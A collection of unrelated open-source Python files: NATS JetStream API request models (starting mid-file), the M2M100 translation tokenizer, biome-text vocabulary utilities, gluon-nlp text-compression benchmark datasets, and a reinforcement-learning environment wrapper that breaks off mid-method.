description="How messages are retained in the Stream, once this is exceeded old messages are removed.",
)
max_consumers: int = Field(
...,
description="How many Consumers can be defined for a given Stream. -1 for unlimited.",
ge=-1,
)
max_msgs: int = Field(
...,
description="How many messages may be in a Stream, oldest messages will be removed if the Stream exceeds this size. -1 for unlimited.",
ge=-1,
)
max_msgs_per_subject: Optional[int] = Field(
-1,
description="For wildcard streams ensure that for every unique subject this many messages are kept - a per subject retention limit",
ge=-1,
)
max_bytes: int = Field(
...,
description="How big the Stream may be, when the combined stream size exceeds this old messages are removed. -1 for unlimited.",
ge=-1,
)
max_age: int = Field(
...,
description="Maximum age of any message in the stream, expressed in nanoseconds. 0 for unlimited.",
ge=0,
)
max_msg_size: Optional[int] = Field(
-1,
description="The largest message that will be accepted by the Stream. -1 for unlimited.",
ge=-1,
)
storage: Storage = Field(
..., description="The storage backend to use for the Stream."
)
num_replicas: int = Field(
...,
description="How many replicas to keep for each message.",
ge=1,
le=5,
)
no_ack: Optional[bool] = Field(
False,
description="Disables acknowledging messages that are received by the Stream.",
)
template_owner: Optional[str] = Field(
None,
description="When the Stream is managed by a Stream Template this identifies the template that manages the Stream.",
)
discard: Optional[Discard] = Field(
"old",
description="When a Stream reach it's limits either old messages are deleted or new ones are denied",
)
duplicate_window: Optional[int] = Field(
0,
description="The time window to track duplicate messages for, expressed in nanoseconds. 0 for default",
ge=0,
)
placement: Optional[Placement] = Field(
None,
description="Placement directives to consider when placing replicas of this stream, random placement when unset",
)
mirror: Optional[Mirror] = Field(
None,
description="Maintains a 1:1 mirror of another stream with name matching this property. When a mirror is configured subjects and sources must be empty.",
)
sources: Optional[List[Source]] = Field(
None, description="List of Stream names to replicate into this Stream"
)
class IoNatsJetstreamApiV1StreamCreateRequest(CreateRequestConfig, BaseRequest):
pass
class IoNatsJetstreamApiV1StreamUpdateRequest(CreateRequestConfig, BaseRequest):
pass
class IoNatsJetstreamApiV1StreamInfoRequest(BaseRequest):
deleted_details: Optional[bool] = Field(
None,
description="When true will result in a full list of deleted message IDs being returned in the info response",
)
class IoNatsJetstreamApiV1StreamListRequest(BaseRequest):
offset: Optional[int] = Field(
None,
description="Number of streams to skip",
ge=0,
)
class IoNatsJetstreamApiV1StreamNamesRequest(BaseRequest):
offset: Optional[int] = Field(
None,
description="Number of streams to skip",
ge=0,
)
class IoNatsJetstreamApiV1StreamMsgGetRequest(BaseRequest):
seq: Optional[int] = Field(
None,
description="Stream sequence number of the message to retrieve. Cannot be combined with last_by_subj",
)
last_by_subj: Optional[str] = Field(
None,
description="Retrieves the last message for a given subject, cannot be combined with seq",
)
@root_validator
def check_exclusive_params(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Ensure exactly 1 parameter is set between 'seq' and 'last_by_subj'"""
seq = values.get("seq", None)
last_by_subj = values.get("last_by_subj", None)
if seq and last_by_subj:
raise ValueError(
"Both 'seq' and 'last_by_subj' arguments cannot be specified at same time"
)
if seq is None and not last_by_subj:
raise ValueError(
"Either 'seq' or 'last_by_subj' argument must be specified."
)
return values
class IoNatsJetstreamApiV1StreamMsgDeleteRequest(BaseRequest):
seq: int = Field(
...,
description="Stream sequence number of the message to delete",
)
no_erase: Optional[bool] = Field(
None,
description="Default will securely remove a message and rewrite the data with random data, set this to true to only remove the message",
)
class IoNatsJetstreamApiV1StreamPurgeRequest(BaseRequest):
filter: Optional[str] = Field(
None, description="Restrict purging to messages that match this subject"
)
seq: Optional[int] = Field(
None,
description="Purge all messages up to but not including the message with this sequence. Can be combined with subject filter but not the keep option",
)
keep: Optional[int] = Field(
None,
description="Ensures this many messages are present after the purge. Can be combined with the subject filter but not the sequence",
)
class IoNatsJetstreamApiV1StreamSnapshotRequest(BaseRequest):
deliver_subject: str = Field(
...,
description="The NATS subject where the snapshot will be delivered",
min_length=1,
)
no_consumers: Optional[bool] = Field(
None,
description="When true consumer states and configurations will not be present in the snapshot",
)
chunk_size: Optional[int] = Field(
None,
description="The size of data chunks to send to deliver_subject",
ge=1024,
)
jsck: Optional[bool] = Field(
False,
description="Check all message's checksums prior to snapshot",
)
|
# Copyright 2021 The Fairseq Authors and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes for M2M100."""
import json
from contextlib import contextmanager
from pathlib import Path
from shutil import copyfile
from typing import Any, Dict, List, Optional, Tuple, Union
import sentencepiece
from ...tokenization_utils import BatchEncoding, PreTrainedTokenizer
from ...utils import logging
logger = logging.get_logger(__name__)
SPIECE_UNDERLINE = "▁"
VOCAB_FILES_NAMES = {
"vocab_file": "vocab.json",
"spm_file": "sentencepiece.bpe.model",
"tokenizer_config_file": "tokenizer_config.json",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"facebook/m2m100_418M": "https://huggingface.co/facebook/m2m100_418M/resolve/main/vocab.json",
"facebook/m2m100_1.2B": "https://huggingface.co/facebook/m2m100_1.2B/resolve/main/vocab.json",
},
"spm_file": {
"facebook/m2m100_418M": "https://huggingface.co/facebook/m2m100_418M/resolve/main/sentencepiece.bpe.model",
"facebook/m2m100_1.2B": "https://huggingface.co/facebook/m2m100_1.2B/resolve/main/sentencepiece.bpe.model",
},
"tokenizer_config_file": {
"facebook/m2m100_418M": "https://huggingface.co/facebook/m2m100_418M/resolve/main/tokenizer_config.json",
"facebook/m2m100_1.2B": "https://huggingface.co/facebook/m2m100_1.2B/resolve/main/tokenizer_config.json",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"facebook/m2m100_418M": 1024,
}
# fmt: off
FAIRSEQ_LANGUAGE_CODES = {
"m2m100": ["af", "am", "ar", "ast", "az", "ba", "be", "bg", "bn", "br", "bs", "ca", "ceb", "cs", "cy", "da", "de", "el", "en", "es", "et", "fa", "ff", "fi", "fr", "fy", "ga", "gd", "gl", "gu", "ha", "he", "hi", "hr", "ht", "hu", "hy", "id", "ig", "ilo", "is", "it", "ja", "jv", "ka", "kk", "km", "kn", "ko", "lb", "lg", "ln", "lo", "lt", "lv", "mg", "mk", "ml", "mn", "mr", "ms", "my", "ne", "nl", "no", "ns", "oc", "or", "pa", "pl", "ps", "pt", "ro", "ru", "sd", "si", "sk", "sl", "so", "sq", "sr", "ss", "su", "sv", "sw", "ta", "th", "tl", "tn", "tr", "uk", "ur", "uz", "vi", "wo", "xh", "yi", "yo", "zh", "zu"],
"wmt21": ['en', 'ha', 'is', 'ja', 'cs', 'ru', 'zh', 'de']
}
# fmt: on
class M2M100Tokenizer(PreTrainedTokenizer):
"""
Construct an M2M100 tokenizer. Based on [SentencePiece](https://github.com/google/sentencepiece).
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods.
Users should refer to this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
Path to the vocabulary file.
spm_file (`str`):
Path to [SentencePiece](https://github.com/google/sentencepiece) file (generally has a .spm extension)
that contains the vocabulary.
src_lang (`str`, *optional*):
A string representing the source language.
tgt_lang (`str`, *optional*):
A string representing the target language.
eos_token (`str`, *optional*, defaults to `"</s>"`):
The end of sequence token.
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
language_codes (`str`, *optional*, defaults to `"m2m100"`):
What language codes to use. Should be one of `"m2m100"` or `"wmt21"`.
sp_model_kwargs (`dict`, *optional*):
Will be passed to the `SentencePieceProcessor.__init__()` method. The [Python wrapper for SentencePiece](https://github.com/google/sentencepiece/tree/master/python) can be used, among other things, to set:
- `enable_sampling`: Enable subword regularization.
- `nbest_size`: Sampling parameters for unigram. Invalid for BPE-Dropout.
- `nbest_size = {0,1}`: No sampling is performed.
- `nbest_size > 1`: samples from the nbest_size results.
- `nbest_size < 0`: assuming that nbest_size is infinite and samples from the all hypothesis (lattice)
using forward-filtering-and-backward-sampling algorithm.
- `alpha`: Smoothing parameter for unigram sampling, and dropout probability of merge operations for
BPE-dropout.
Examples:
```python
>>> from transformers import M2M100Tokenizer
>>> tokenizer = M2M100Tokenizer.from_pretrained("facebook/m2m100_418M, src_lang="en", tgt_lang="ro")
>>> src_text = " UN Chief Says There Is No Military Solution in Syria"
>>> tgt_text = "Şeful ONU declară că nu există o soluţie militară în Siria"
>>> model_inputs = tokenizer(src_text, return_tensors="pt")
>>> with tokenizer.as_target_tokenizer():
... labels = tokenizer(tgt_text, return_tensors="pt").input_ids
>>> # model(**model_inputs, labels=labels) should work
```"""
vocab_files_names = VOCAB_FILES_NAMES
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
model_input_names = ["input_ids", "attention_mask"]
prefix_tokens: List[int] = []
suffix_tokens: List[int] = []
def __init__(
self,
vocab_file,
spm_file,
src_lang=None,
tgt_lang=None,
bos_token="<s>",
eos_token="</s>",
sep_token="</s>",
pad_token="<pad>",
unk_token="<unk>",
language_codes="m2m100",
sp_model_kwargs: Optional[Dict[str, Any]] = None,
num_madeup_words=8,
**kwargs,
) -> None:
self.sp_model_kwargs = {} if sp_model_kwargs is None else sp_model_kwargs
self.language_codes = language_codes
fairseq_language_code = FAIRSEQ_LANGUAGE_CODES[language_codes]
self.lang_code_to_token = {lang_code: f"__{lang_code}__" for lang_code in fairseq_language_code}
kwargs["additional_special_tokens"] = kwargs.get("additional_special_tokens", [])
kwargs["additional_special_tokens"] += [
self.get_lang_token(lang_code)
for lang_code in fairseq_language_code
if self.get_lang_token(lang_code) not in kwargs["additional_special_tokens"]
]
super().__init__(
src_lang=src_lang,
tgt_lang=tgt_lang,
bos_token=bos_token,
eos_token=eos_token,
sep_token=sep_token,
unk_token=unk_token,
pad_token=pad_token,
language_codes=language_codes,
sp_model_kwargs=self.sp_model_kwargs,
num_madeup_words=num_madeup_words,
**kwargs,
)
self.vocab_file = vocab_file
self.encoder = load_json(vocab_file)
self.decoder = {v: k for k, v in self.encoder.items()}
self.spm_file = spm_file
self.sp_model = load_spm(spm_file, self.sp_model_kwargs)
self.encoder_size = len(self.encoder)
self.lang_token_to_id = {
self.get_lang_token(lang_code): self.encoder_size + i for i, lang_code in enumerate(fairseq_language_code)
}
self.lang_code_to_id = {lang_code: self.encoder_size + i for i, lang_code in enumerate(fairseq_language_code)}
self.id_to_lang_token = {v: k for k, v in self.lang_token_to_id.items()}
self._src_lang = src_lang if src_lang is not None else "en"
self.tgt_lang = tgt_lang
self.cur_lang_id = self.get_lang_id(self._src_lang)
self.set_src_lang_special_tokens(self._src_lang)
self.num_madeup_words = num_madeup_words
@property
def vocab_size(self) -> int:
return len(self.encoder) + len(self.lang_token_to_id) + self.num_madeup_words
@property
def src_lang(self) -> str:
return self._src_lang
@src_lang.setter
def src_lang(self, new_src_lang: str) -> None:
self._src_lang = new_src_lang
self.set_src_lang_special_tokens(self._src_lang)
def _tokenize(self, text: str) -> List[str]:
return self.sp_model.encode(text, out_type=str)
def _convert_token_to_id(self, token):
if token in self.lang_token_to_id:
return self.lang_token_to_id[token]
return self.encoder.get(token, self.encoder[self.unk_token])
def _convert_id_to_token(self, index: int) -> str:
"""Converts an index (integer) in a token (str) using the decoder."""
if index in self.id_to_lang_token:
return self.id_to_lang_token[index]
return self.decoder.get(index, self.unk_token)
def convert_tokens_to_string(self, tokens: List[str]) -> str:
"""Converts a sequence of tokens (strings for sub-words) in a single string."""
return self.sp_model.decode(tokens)
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
prefix_ones = [1] * len(self.prefix_tokens)
suffix_ones = [1] * len(self.suffix_tokens)
if token_ids_1 is None:
return prefix_ones + ([0] * len(token_ids_0)) + suffix_ones
return prefix_ones + ([0] * len(token_ids_0)) + ([0] * len(token_ids_1)) + suffix_ones
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. An MBART sequence has the following format, where `X` represents the sequence:
- `input_ids` (for encoder) `X [eos, src_lang_code]`
- `decoder_input_ids`: (for decoder) `X [eos, tgt_lang_code]`
BOS is never used. Pairs of sequences are not the expected use case, but they will be handled without a
separator.
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return self.prefix_tokens + token_ids_0 + self.suffix_tokens
# We don't expect to process pairs, but leave the pair logic for API consistency
return self.prefix_tokens + token_ids_0 + token_ids_1 + self.suffix_tokens
def get_vocab(self) -> Dict:
vocab = self.encoder.copy()
vocab.update(self.added_tokens_encoder)
return vocab
def __getstate__(self) -> Dict:
state = self.__dict__.copy()
state["sp_model"] = None
return state
def __setstate__(self, d: Dict) -> None:
self.__dict__ = d
# for backward compatibility
if not hasattr(self, "sp_model_kwargs"):
self.sp_model_kwargs = {}
self.sp_model = load_spm(self.spm_file, self.sp_model_kwargs)
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
save_dir = Path(save_directory)
assert save_dir.is_dir(), f"{save_directory} should be a directory"
vocab_save_path = save_dir / (
(filename_prefix + "-" if filename_prefix else "") + self.vocab_files_names["vocab_file"]
)
spm_save_path = save_dir / (
(filename_prefix + "-" if filename_prefix else "") + self.vocab_files_names["spm_file"]
)
save_json(self.encoder, vocab_save_path)
if not spm_save_path.exists():
copyfile(self.spm_file, spm_save_path)
return (str(vocab_save_path), str(spm_save_path))
def prepare_seq2seq_batch(
self,
src_texts: List[str],
src_lang: str = "en",
tgt_texts: Optional[List[str]] = None,
tgt_lang: str = "ro",
**kwargs,
) -> BatchEncoding:
self.src_lang = src_lang
self.tgt_lang = tgt_lang
self.set_src_lang_special_tokens(self.src_lang)
return super().prepare_seq2seq_batch(src_texts, tgt_texts, **kwargs)
def _build_translation_inputs(self, raw_inputs, src_lang: Optional[str], tgt_lang: Optional[str], **extra_kwargs):
"""Used by translation pipeline, to prepare inputs for the generate function"""
if src_lang is None or tgt_lang is None:
raise ValueError("Translation requires a `src_lang` and a `tgt_lang` for this model")
self.src_lang = src_lang
inputs = self(raw_inputs, add_special_tokens=True, **extra_kwargs)
tgt_lang_id = self.get_lang_id(tgt_lang)
inputs["forced_bos_token_id"] = tgt_lang_id
return inputs
@contextmanager
def as_target_tokenizer(self):
"""
Temporarily sets the tokenizer for encoding the targets. Useful for tokenizer associated to
sequence-to-sequence models that need a slightly different processing for the labels.
"""
self.set_tgt_lang_special_tokens(self.tgt_lang)
yield
self.set_src_lang_special_tokens(self.src_lang)
def set_src_lang_special_tokens(self, src_lang: str) -> None:
"""Reset the special tokens to the source lang setting. No prefix and suffix=[eos, src_lang_code]."""
lang_token = self.get_lang_token(src_lang)
self.cur_lang_id = self.lang_token_to_id[lang_token]
self.prefix_tokens = [self.cur_lang_id]
self.suffix_tokens = [self.eos_token_id]
def set_tgt_lang_special_tokens(self, tgt_lang: str) -> None:
"""Reset the special tokens to the target language setting. No prefix and suffix=[eos, tgt_lang_code]."""
lang_token = self.get_lang_token(tgt_lang)
self.cur_lang_id = self.lang_token_to_id[lang_token]
self.prefix_tokens = [self.cur_lang_id]
self.suffix_tokens = [self.eos_token_id]
def get_lang_token(self, lang: str) -> str:
return self.lang_code_to_token[lang]
def get_lang_id(self, lang: str) -> int:
lang_token = self.get_lang_token(lang)
return self.lang_token_to_id[lang_token]
def load_spm(path: str, sp_model_kwargs: Dict[str, Any]) -> sentencepiece.SentencePieceProcessor:
spm = sentencepiece.SentencePieceProcessor(**sp_model_kwargs)
spm.Load(str(path))
return spm
def load_json(path: str) -> Union[Dict, List]:
with open(path, "r") as f:
return json.load(f)
def save_json(data, path: str) -> None:
with open(path, "w") as f:
json.dump(data, f, indent=2)
|
<reponame>javispp/biome-text
"""
Manages vocabulary tasks and fetches vocabulary information
Provides utilities for getting information from a given vocabulary.
Provides management actions such as extending the labels, setting new labels or creating an "empty" vocab.
"""
import logging
from typing import Dict
from typing import List
from allennlp.data import Vocabulary
from allennlp.data.vocabulary import DEFAULT_NON_PADDED_NAMESPACES
from biome.text.features import TransformersFeatures
from biome.text.features import WordFeatures
LABELS_NAMESPACE = "gold_labels"
_LOGGER = logging.getLogger(__name__)
def get_labels(vocab: Vocabulary) -> List[str]:
"""Gets list of labels in the vocabulary
Parameters
----------
vocab: `allennlp.data.Vocabulary`
Returns
-------
labels: `List[str]`
A list of label strings
"""
return [k for k in vocab.get_token_to_index_vocabulary(namespace=LABELS_NAMESPACE)]
def label_for_index(vocab: Vocabulary, idx: int) -> str:
"""Gets label string for a label `int` id
Parameters
----------
vocab: `allennlp.data.Vocabulary`
idx: `int
the token index
Returns
-------
label: `str`
The string for a label id
"""
return vocab.get_token_from_index(idx, namespace=LABELS_NAMESPACE)
def index_for_label(vocab: Vocabulary, label: str) -> int:
"""Gets the label `int` id for label string
Parameters
----------
vocab: `allennlp.data.Vocabulary``
label: `str`
the label
Returns
-------
label_idx: `int`
The label id for label string
"""
return vocab.get_token_index(label, namespace=LABELS_NAMESPACE)
def get_index_to_labels_dictionary(vocab: Vocabulary) -> Dict[int, str]:
"""Gets a dictionary for turning label `int` ids into label strings
Parameters
----------
vocab: `allennlp.data.Vocabulary`
Returns
-------
labels: `Dict[int, str]`
A dictionary to get fetch label strings from ids
"""
return vocab.get_index_to_token_vocabulary(LABELS_NAMESPACE)
def words_vocab_size(vocab: Vocabulary) -> int:
"""Fetches the vocabulary size for the `words` namespace
Parameters
----------
vocab: `allennlp.data.Vocabulary`
Returns
-------
size: `int`
The vocabulary size for the words namespace
"""
return vocab.get_vocab_size(WordFeatures.namespace)
def extend_labels(vocab: Vocabulary, labels: List[str]):
"""Adds a list of label strings to the vocabulary
Use this to add new labels to your vocabulary (e.g., useful for reusing the weights of an existing classifier)
Parameters
----------
vocab: `allennlp.data.Vocabulary`
labels: `List[str]`
A list of strings containing the labels to add to an existing vocabulary
"""
vocab.add_tokens_to_namespace(labels, namespace=LABELS_NAMESPACE)
def set_labels(vocab: Vocabulary, new_labels: List[str]):
"""Resets the labels in the vocabulary with a given labels string list
Parameters
----------
vocab: `allennlp.data.Vocabulary`
new_labels: `List[str]`
The label strings to add to the vocabulary
"""
for namespace_vocab in [
vocab.get_token_to_index_vocabulary(LABELS_NAMESPACE),
vocab.get_index_to_token_vocabulary(LABELS_NAMESPACE),
]:
tokens = list(namespace_vocab.keys())
for token in tokens:
del namespace_vocab[token]
extend_labels(vocab, new_labels)
def create_empty_vocabulary() -> Vocabulary:
"""Creates an empty Vocabulary with configured namespaces
Returns
-------
empty_vocab
The transformers namespace is added to the `non_padded_namespace`.
"""
# Following is a hack, because AllenNLP handles the Transformers vocab differently!
# The transformer vocab has its own padding and oov token, so we add it to the non_padded_namespaces.
# AllenNLP gives its "transformer vocab" by default the "tags" namespace, which is a non_padded_namespace ...
# If we do not do this, then writing the vocab to a file and loading it will fail, since AllenNLP will
# look for its default OVV token in the vocab unless it is flagged as non_padded_namespace.
# (see the doc string of `allennlp.data.token_indexers.PretrainedTransformerIndexer`)
return Vocabulary(
non_padded_namespaces=DEFAULT_NON_PADDED_NAMESPACES
+ (TransformersFeatures.namespace,)
)
def is_empty(vocab: Vocabulary, namespaces: List[str]) -> bool:
"""Checks if at least one of the given namespaces has an empty vocab.
Parameters
----------
vocab
The vocabulary
namespaces
Namespaces to check in the vocabulary
Returns
-------
True if one or more namespaces have an empty vocab
"""
# If a namespace does not exist in the vocab, a default one is created on the fly with a padding and oov token
# We must drop the padding and out of vocab (oov) tokens -> 2 tokens
return any([vocab.get_vocab_size(namespace) < 3 for namespace in namespaces])
|
<reponame>shangz-ai/gluon-nlp
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=
"""Large Text Compression Benchmark.
The test data for the Large Text Compression Benchmark is the first 109 bytes
of the English Wikipedia dump on Mar. 3, 2006.
http://download.wikipedia.org/enwiki/20060303/enwiki-20060303-pages-articles.xml.bz2
(1.1 GB or 4.8 GB after decompressing with bzip2 - link no longer works).
Results are also given for the first 108 bytes, which is also used for the
Hutter Prize. These files have the following sizes and checksums:
File Size (bytes) MD5 (GNU md5sum 1.22) SHA-1 (SlavaSoft fsum 2.51)
------ ------------- -------------------------------- ----------------------------------------
enwik8 100,000,000 a1fa5ffddb56f4953e226637dabbb36a 57b8363b814821dc9d47aa4d41f58733519076b2
enwik9 1,000,000,000 e206c3450ac99950df65bf70ef61a12d 2996e86fb978f93cca8f566cc56998923e7fe581
See http://mattmahoney.net/dc/text.html and
http://mattmahoney.net/dc/textdata.html for more information.
"""
__all__ = ['Text8', 'Fil9', 'Enwik8']
import os
import zipfile
from mxnet.gluon.utils import _get_repo_file_url, check_sha1, download
from ...base import get_home_dir
from ..dataset import CorpusDataset
class _LargeTextCompressionBenchmark(CorpusDataset):
def __init__(self, root, segment, **kwargs):
root = os.path.expanduser(root)
if not os.path.isdir(root):
os.makedirs(root)
self._root = root
self._segment = segment
self._namespace = 'gluon/dataset/large_text_compression_benchmark'
super().__init__(
self._get_data(self.archive_file, self.data_file, segment, root, self._namespace),
**kwargs)
@staticmethod
def _get_data(archive_file, data_file, segment, root, namespace):
archive_file_name, archive_hash = archive_file
data_file_name, data_hash = data_file[segment]
path = os.path.join(root, data_file_name)
if not os.path.exists(path) or not check_sha1(path, data_hash):
downloaded_file_path = download(_get_repo_file_url(namespace, archive_file_name),
path=root, sha1_hash=archive_hash)
with zipfile.ZipFile(downloaded_file_path, 'r') as zf:
zf.extractall(root)
return path
class Text8(_LargeTextCompressionBenchmark):
"""Text8 corpus
http://mattmahoney.net/dc/textdata.html
Part of the test data for the Large Text Compression Benchmark
http://mattmahoney.net/dc/text.html. The first 10**8 bytes of the cleaned
English Wikipedia dump on Mar. 3, 2006.
License: https://en.wikipedia.org/wiki/Wikipedia:Copyrights
Parameters
----------
root : str, default '$MXNET_HOME/datasets/text8'
Path to temp folder for storing data.
MXNET_HOME defaults to '~/.mxnet'.
"""
archive_file = ('text8-6c70299b.zip', '6c70299b93b7e1f927b42cd8f6ac1a31547c7a2e')
data_file = {
'train': ('text8', '0dc3edebc970dcc96137e7deda4d9995af9d93de')
}
def __init__(self,
root=os.path.join(get_home_dir(), 'datasets', 'text8'),
segment='train',
max_sentence_length=10000):
self._max_sentence_length = max_sentence_length
super().__init__(root=root, segment=segment)
# pylint: disable=access-member-before-definition
if max_sentence_length:
data = []
for sentence in self._data:
for i in range(0, len(sentence), max_sentence_length):
data.append(sentence[i:i + max_sentence_length])
self._data = data
class Fil9(_LargeTextCompressionBenchmark):
"""Fil9 corpus
http://mattmahoney.net/dc/textdata.html
Part of the test data for the Large Text Compression Benchmark
http://mattmahoney.net/dc/text.html. The first 10**9 bytes of the English
Wikipedia dump on Mar. 3, 2006.
License: https://en.wikipedia.org/wiki/Wikipedia:Copyrights
Parameters
----------
root : str, default '$MXNET_HOME/datasets/fil9'
Path to temp folder for storing data.
MXNET_HOME defaults to '~/.mxnet'.
"""
archive_file = ('fil9-e2a6a602.zip',
'e2a6a602be8d3f9712c92423581aa47e7ffd5906')
data_file = {'train': ('fil9', '08caf9b1d5600233aa19cb6b25d7b798558304d3')}
def __init__(self,
root=os.path.join(get_home_dir(), 'datasets', 'fil9'),
segment='train',
max_sentence_length=None):
self._max_sentence_length = max_sentence_length
super().__init__(root=root, segment=segment)
# pylint: disable=access-member-before-definition
if max_sentence_length is not None:
data = []
for sentence in self._data:
for i in range(0, len(sentence), max_sentence_length):
data.append(sentence[i:i + max_sentence_length])
self._data = data
class Enwik8(_LargeTextCompressionBenchmark):
"""Enwik8 corpus
http://mattmahoney.net/dc/textdata.html
Part of the test data for the Large Text Compression Benchmark
http://mattmahoney.net/dc/text.html. The first 10**8 bytes of the English
Wikipedia dump on Mar. 3, 2006.
License: https://en.wikipedia.org/wiki/Wikipedia:Copyrights
Parameters
----------
root : str, default '$MXNET_HOME/datasets/text8'
Path to temp folder for storing data.
MXNET_HOME defaults to '~/.mxnet'.
segment
train, test, valid, trainraw, testraw and validraw segments
preprocessed with
https://github.com/salesforce/awd-lstm-lm/blob/master/data/enwik8/prep_enwik8.py
are provided.
"""
archive_file = ('enwik8-d25f6043.zip', 'd25f60433af3c02ec6d2dec2435e1732f42a1a68')
data_file = {
'test': ('test.txt', '1389fdf312b253350a959d4fd63e5e9ae7fe74d4'),
'train': ('train.txt', 'eff044567358678cd81b9eda516cb146fdba7360'),
'val': ('valid.txt', '2076ad59caee0099b6c68e66f92d7ef7d0975113'),
'testraw': ('test.txt.raw', 'c30edaac372090c10a562b8777a6703fa3dd9f7e'),
'trainraw': ('train.txt.raw', 'd8a8d0ca2a95f20c9d243cb60a579a59d12b0f48'),
'valraw': ('valid.txt.raw', '2e6218a15c1d5c3c2d23f8092bf07bc24da0d922')
}
def __init__(self, root=os.path.join(get_home_dir(), 'datasets', 'enwik8'),
segment: str = 'train'):
super().__init__(root=root, segment=segment)
|
<reponame>suleymanaslan/obstacle-tower-rl
# adapted from https://github.com/Kaixhin/Rainbow
from collections import deque
import time
import torch
import cv2
import gym
import numpy as np
from gym.wrappers.pixel_observation import PixelObservationWrapper
from obstacle_tower_env import ObstacleTowerEnv as ObstacleTower
from IPython import display
from PIL import Image
class Env:
def __init__(self, action_size, history_length):
self.device = torch.device("cuda:0")
self.wrapped_env = self._get_env()
self.action_space = [i for i in range(action_size)]
self.window = history_length
self.state_buffer = deque([], maxlen=self.window)
def _get_env(self):
return PixelObservationWrapper(gym.make("LunarLander-v2"), pixels_only=True)
def _reset_buffer(self):
for _ in range(self.window):
self.state_buffer.append(torch.zeros(84, 84, device=self.device))
def _process_observation(self, observation):
observation = cv2.cvtColor(cv2.resize(observation["pixels"], (84, 84), interpolation=cv2.INTER_AREA),
cv2.COLOR_RGB2GRAY)
observation = torch.tensor(observation, dtype=torch.float32, device=self.device).div_(255)
return observation
def render(self):
self.wrapped_env.render()
def reset(self):
self._reset_buffer()
observation = self.wrapped_env.reset()
observation = self._process_observation(observation)
self.state_buffer.append(observation)
return torch.stack(list(self.state_buffer), 0)
def close(self):
self.wrapped_env.close()
def _step(self, action, frame_buffer, render=False):
reward = 0
for t in range(4):
observation_t, reward_t, done, info = self.wrapped_env.step(action)
if render:
self.render()
reward += reward_t
if t == 2:
frame_buffer[0] = self._process_observation(observation_t)
elif t == 3:
frame_buffer[1] = self._process_observation(observation_t)
if done:
break
observation = frame_buffer.max(0)[0]
self.state_buffer.append(observation)
return torch.stack(list(self.state_buffer), 0), reward, done, info
def step(self, action):
frame_buffer = torch.zeros(2, 84, 84, device=self.device)
return self._step(action, frame_buffer)
class SimpleEnv(Env):
def __init__(self, action_size, history_length):
super(SimpleEnv, self).__init__(action_size, history_length)
def _get_env(self):
return gym.make("LunarLander-v2")
def _reset_buffer(self):
for _ in range(self.window):
self.state_buffer.append(torch.zeros(8, device=self.device))
def _process_observation(self, observation):
observation = torch.tensor(observation, dtype=torch.float32, device=self.device)
return observation
def step(self, action):
frame_buffer = torch.zeros(2, 8, device=self.device)
return self._step(action, frame_buffer)
class ObstacleTowerEnv(Env):
def __init__(self, action_size, history_length):
super(ObstacleTowerEnv, self).__init__(action_size, history_length)
self.movement_dict = {0: "No-Op", 1: "Forward", 2: "Backward"}
self.cam_rot_dict = {0: "No-Op", 1: "Counter-Clockwise", 2: "Clockwise"}
self.jump_dict = {0: "No-Op", 1: "Jump"}
self.turn_dict = {0: "No-Op", 1: "Right", 2: "Left"}
def _get_env(self):
return ObstacleTower(f"obstacle-tower-env/obstacletower_v4.0_windows/ObstacleTower",
retro=True, realtime_mode=False, greyscale=True)
def seed(self, seed):
self.wrapped_env.seed(seed)
def floor(self, floor):
self.wrapped_env.floor(floor)
@staticmethod
def action_to_mda(action, simple_action=True):
if simple_action:
movement = action // 3
cam_rot = action % 3
jump = 0
